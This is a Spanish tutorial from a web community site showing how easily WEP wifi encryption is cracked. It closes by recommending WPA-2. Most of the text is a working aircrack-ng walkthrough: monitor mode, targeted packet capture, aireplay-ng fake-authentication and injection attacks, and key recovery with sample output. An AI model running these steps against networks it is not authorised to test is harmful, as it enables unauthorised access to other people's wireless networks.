Comunidad de diseño web y desarrollo en internet online

Hackear wifi WEP es fácil

Este tip sólo existe para educar en el sistema de encriptación inalámbrica WEP, su supuesta seguridad y por qué no recomiendo su uso, debido a lo fácil que es romper la seguridad WEP y hackear una conexión wifi con WEP.

Si no entiendes algo o estás perdido en esto del wifi, crackeo, seguridad y WEP, te recomiendo leer nuestra guía básica: Hacking de wifi y cracking de WEP.

Qué es WEP


Según la wikipedia: WEP, acrónimo de Wired Equivalent Privacy o "Privacidad Equivalente a Cableado", es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad.

Básicamente es un sistema de encriptación para redes inalámbricas ya sea con autenticación abierta o con clave compartida.

¿Como se podría pasar la seguridad WEP?


Para poder atravesar esta seguridad se utilizan programas llamados Packet Sniffers y un crackeador WEP. Se captura una cantidad determinada de paquetes y luego mediante el crackeador se rompe el cifrado de la red. Un key cracker es un programa basado generalmente en matemáticas estadísticas que procesa los paquetes capturas para descifrar la clave WEP.

Es bastante simple y se los muestro a continuación, cualquier persona con una tarjeta inalámbrica y un sistema de comandos lo puedes hacer.

Crackeo de WEP con Aircrack-ng


Para poder realizar lo anterior tenemos disponibles una serie de herramientas bastantes útiles, en esta situación utilizaremos una suite de herramientas que reúne todos los elementos necesarios para desencriptar el sistema WEP: aircrack-ng. Lo haremos en Linux, pero funciona en Windows también.

En este caso utilizaremos un sistema operativo basado en Debian: Ubuntu. Para instalar la suite aircrack-ng basta con ejecutar en linea de comandos:

Código :

sudo apt-get install aircrack-ng

El siguiente paso es poner nuestra tarjeta de red en modo monitor.. ¿Pero que es eso?

Wikipedia :

Modo Monitor, también llamado de Modo de Monitoramento o modo RFMON, permite que un ordenador con una placa con interfaz de red wireless (WNIC) realice monitoramento de todo el tráfico recibido de la red wireless.


Activamos:

Código :

airmon-ng start wlan0

Se activa en mon0, esto ya depende de tu tarjeta de red, para más información (por que este no es el tema) consulta SanGoogle.

Y monitoreamos:

Código :

airodump-ng mon0

Al insertar el ultimo comando nuestra tarjeta de red está captando y monitoreando todas las redes disponibles a nuestro alrededor. Saldrán varios elementos, información sobre las redes. Nos enfocaremos principalmente en BSSID (una clave estilo MAC), CH (el canal donde se encuentra la red), ENC (la encriptación debe de ser WEP por obvias razones) y el ESSID (básicamente el nombre de la red).

Para obtener esos datos, corremos:

Código :

airodump-ng -c [# canal] -w [ESSID] --bssid [BSSID] mon0

En la primera parte estamos utilizando la suite aircrack-ng.
-c Especificamos el canal.
-w Especificamos ESSID.
--bssid Habla por si solo.
mon0 De donde estamos monitoreando.

Inyección de tráfico a redes wifi WEP con aireplay


Así es. Y basta con la herramienta aireplay (el cual inyecta tráfico para elevar la captura de vectores de inicio) para hacerlo.

Código :

aireplay-ng -1 6000 -a [BSSID] -h [tu MAC] mon0

Donde:
-1 6000 Es un tipo de ataque que genera una autenticación falsa con retraso.
-a Es el punto de acceso, enseguida ponemos el BSSID.
-h Es el source, aquí ponemos nuestra MAC address.
mon0 La interfaz que utilizamos.

Para ver lo que inyectamos:

Código :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h [tu MAC] mon0

-2 El tipo de ataque interactivo con los paquetes.
-p Aplica control en palabras.
-c Una MAC destino.
-b BSSID.
-h Es el source, aquí ponemos nuestra MAC address.
mon0 La interfaz que utilizamos.

Crackear la clave WEP de la red wifi elegida


Lo haremos con un key cracker, la suite aircrack-ng lo tiene, así que lo activamos con el siguiente y simple comando.

Código :

aircrack-ng -z [BSSID]*.cap

Bastará que hayamos capturado suficientes paquetes para que el key cracker sea capaz de desencriptar la red WEP. En unos segundos o minutos (según sea el caso) aparecerá un mensaje como el siguiente:

Código :

KEY FOUND! [ 1234567890 ]


Espero que con este pequeño tip haya quedado claro que la encriptación WEP en las redes inalámbricas no es segura. Siempre hay métodos para desencriptar cualquier tipo de sistema pero la dificultad aumenta conforme a las tecnologías avanzan.

¿Qué recomiendo? Usa WPA-2.

¿Sabes SQL? ¿No-SQL? Aprende MySQL, PostgreSQL, MongoDB, Redis y más con el Curso Profesional de Bases de Datos que empieza el martes, en vivo.

Publica tu comentario

o puedes...

¿Estás registrado en Cristalab y quieres
publicar tu URL y avatar?

¿No estás registrado aún pero quieres hacerlo antes de publicar tu comentario?

Registrate